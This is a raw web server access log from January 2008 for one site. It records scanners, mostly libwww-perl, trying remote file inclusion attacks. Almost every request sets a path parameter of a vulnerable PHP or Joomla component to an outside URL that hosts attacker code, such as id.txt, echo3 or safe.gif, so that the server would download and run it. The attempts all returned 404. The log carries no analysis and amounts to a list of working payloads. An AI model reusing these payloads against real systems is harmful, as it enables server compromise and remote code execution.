195.62.12.248 - - [15/Jan/2008:11:25:48 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:11:25:48 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:11:25:49 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.154.233.98 - - [15/Jan/2008:11:25:58 -0800] "GET /logs/access_071224.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.huerzeler-reisen.ch/cache/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.154.233.98 - - [15/Jan/2008:11:25:58 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.huerzeler-reisen.ch/cache/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.154.233.98 - - [15/Jan/2008:11:25:59 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.huerzeler-reisen.ch/cache/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:11:26:57 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:11:26:57 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:11:26:57 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:11:27:55 -0800] "GET /logs/access_071228.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.21.95.220 - - [15/Jan/2008:11:28:03 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.21.95.220 - - [15/Jan/2008:11:28:08 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:11:29:38 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.170.162 - - [15/Jan/2008:11:29:39 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.21.95.220 - - [15/Jan/2008:11:30:10 -0800] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.21.95.220 - - [15/Jan/2008:11:30:15 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://forum.juggla.net/images/avatars/.as./figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
163.25.97.78 - - [15/Jan/2008:11:31:42 -0800] "GET /logs/access_071224.log//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.57 - - [15/Jan/2008:11:32:36 -0800] "GET /logs/administrator/components/com_color/admin.color.php?mosConfig_live_site=http://miepicardenas.org/administrator/components/com_mp3player/mp3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.57 - - [15/Jan/2008:11:32:36 -0800] "GET /administrator/components/com_color/admin.color.php?mosConfig_live_site=http://miepicardenas.org/administrator/components/com_mp3player/mp3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.234.200.226 - - [15/Jan/2008:11:33:07 -0800] "GET /logs/phfito/phfito-post?SRC_PATH=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
77.234.200.226 - - [15/Jan/2008:11:33:11 -0800] "GET /phfito/phfito-post?SRC_PATH=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
203.130.246.56 - - [15/Jan/2008:11:33:44 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.130.246.56 - - [15/Jan/2008:11:33:45 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.130.246.56 - - [15/Jan/2008:11:33:46 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.utenti.lycos.it/eragonz/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:11:34:29 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:11:34:29 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:11:34:30 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
122.153.16.5 - - [15/Jan/2008:11:34:31 -0800] "GET /logs/access_071220.log//modules/Neos_Chronos/header.php?base_folder=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:11:34:44 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:11:34:45 -0800] "GET //skin/zero_vote/error.php?dir=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:11:34:45 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:11:34:46 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:11:34:46 -0800] "GET //skin/zero_vote/error.php?dir=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:11:34:47 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.100.220.42 - - [15/Jan/2008:11:35:14 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.bettysbluestarlounge.com/Calendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.42 - - [15/Jan/2008:11:35:30 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.bettysbluestarlounge.com/Calendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [15/Jan/2008:11:36:44 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [15/Jan/2008:11:36:44 -0800] "GET //skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [15/Jan/2008:11:36:44 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:11:37:40 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:11:38:32 -0800] "GET /logs/access.log/?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.59.21.251 - - [15/Jan/2008:11:38:38 -0800] "GET /logs/access.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.59.21.251 - - [15/Jan/2008:11:38:38 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.59.21.251 - - [15/Jan/2008:11:38:39 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:11:39:09 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:11:39:12 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.59.21.251 - - [15/Jan/2008:11:39:18 -0800] "GET /logs/access_071216.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://mysunsethouse-lombok.com/images/.../.../on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.165.93 - - [15/Jan/2008:11:39:19 -0800] "GET /logs/access.log/////////?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.30.169.80 - - [15/Jan/2008:11:39:22 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.230.30 - - [15/Jan/2008:11:39:33 -0800] "GET /logs/shopping/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????http://asterweb.com.br/cav/s.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.11.230.30 - - [15/Jan/2008:11:39:33 -0800] "GET /shopping/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????http://asterweb.com.br/cav/s.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.28.44 - - [15/Jan/2008:11:40:05 -0800] "GET /logs/access_070815.log HTTP/1.0" 200 31884 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:11:40:46 -0800] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.117.233.130 - - [15/Jan/2008:11:40:46 -0800] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.buyphpscripts.com/x.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
82.100.220.42 - - [15/Jan/2008:11:41:28 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.bettysbluestarlounge.com/Calendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.42 - - [15/Jan/2008:11:41:28 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.bettysbluestarlounge.com/Calendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:11:41:28 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://barza.us/images/norm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.42 - - [15/Jan/2008:11:41:35 -0800] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.bettysbluestarlounge.com/Calendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.42 - - [15/Jan/2008:11:41:36 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.bettysbluestarlounge.com/Calendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.71.89.170 - - [15/Jan/2008:11:41:45 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.z3roadster.it/home/on.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.71.89.170 - - [15/Jan/2008:11:41:46 -0800] "GET //skin/zero_vote/error.php?dir=http://www.z3roadster.it/home/on.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.71.89.170 - - [15/Jan/2008:11:41:46 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.z3roadster.it/home/on.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.100.220.42 - - [15/Jan/2008:11:42:00 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.bettysbluestarlounge.com/Calendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.100.220.42 - - [15/Jan/2008:11:42:01 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.bettysbluestarlounge.com/Calendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.15.196.106 - - [15/Jan/2008:11:42:04 -0800] "GET /logs/access_071216.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://barza.us/images/norm.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.72.102.60 - - [15/Jan/2008:11:42:08 -0800] "GET /!rfihttp://66.206.168.162:32000/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
61.72.102.60 - - [15/Jan/2008:11:42:10 -0800] "GET /logs/!rfihttp://66.206.168.162:32000/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
200.172.51.130 - - [15/Jan/2008:11:43:03 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.172.51.130 - - [15/Jan/2008:11:43:08 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.71.89.170 - - [15/Jan/2008:11:44:20 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.z3roadster.it/home/on.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.71.89.170 - - [15/Jan/2008:11:44:20 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.z3roadster.it/home/on.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.71.89.170 - - [15/Jan/2008:11:44:20 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.z3roadster.it/home/on.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.172.51.130 - - [15/Jan/2008:11:44:42 -0800] "GET /logs/access_071225.log/content/multithumb/multithumb?mosConfig_absolute_path=http://www.nzvikings.dk/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.71.89.170 - - [15/Jan/2008:11:44:48 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.z3roadster.it/home/on.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:11:46:46 -0800] "GET /logs/access_071229.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:11:46:47 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.62.12.248 - - [15/Jan/2008:11:46:47 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:11:47:00 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:11:47:01 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:11:47:01 -0800] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:11:47:01 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:11:47:02 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:11:49:22 -0800] "GET /logs/access_071228.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
125.251.147.130 - - [15/Jan/2008:11:49:34 -0800] "GET /logs/access_071228.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.184.21 - - [15/Jan/2008:11:50:15 -0800] "GET /logs/access_071228.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.184.21 - - [15/Jan/2008:11:50:16 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.184.21 - - [15/Jan/2008:11:50:17 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.71.89 - - [15/Jan/2008:11:50:36 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.71.89 - - [15/Jan/2008:11:50:37 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/trep/slap/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.11.230.30 - - [15/Jan/2008:11:51:17 -0800] "GET /logs/access_071203.log/shopping/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????http://asterweb.com.br/cav/s.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.184.21 - - [15/Jan/2008:11:51:55 -0800] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.laila.jp/item_pics/derf/testi.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.26.174.67 - - [15/Jan/2008:11:52:43 -0800] "GET /logs/shopping/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://asterweb.com.br/cav/s.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.26.174.67 - - [15/Jan/2008:11:52:43 -0800] "GET /shopping/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://asterweb.com.br/cav/s.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.11.230.30 - - [15/Jan/2008:11:54:23 -0800] "GET /logs/access_071221.log/shopping/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????http://asterweb.com.br/cav/s.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.67.153.114 - - [15/Jan/2008:11:56:53 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://rltrac.com/newsletter/wp-content/themes/themesID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.220.64.3 - - [15/Jan/2008:11:56:58 -0800] "GET /100http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.225.104 - - [15/Jan/2008:11:59:18 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://hate.helloweb.eu/new.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
62.193.225.104 - - [15/Jan/2008:11:59:23 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://hate.helloweb.eu/new.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
218.38.34.152 - - [15/Jan/2008:12:00:35 -0800] "GET /logs/access_071228.log/content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.152 - - [15/Jan/2008:12:00:35 -0800] "GET /content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.152 - - [15/Jan/2008:12:00:36 -0800] "GET /logs/content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.34.152 - - [15/Jan/2008:12:01:44 -0800] "GET /logs/access_071225.log/content/multithumb/multithumb?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.188.10 - - [15/Jan/2008:12:01:48 -0800] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
207.44.188.10 - - [15/Jan/2008:12:01:49 -0800] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://boringtime.com/banget??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
64.26.174.67 - - [15/Jan/2008:12:01:54 -0800] "GET /logs/access_071203.log/shopping/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://asterweb.com.br/cav/s.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
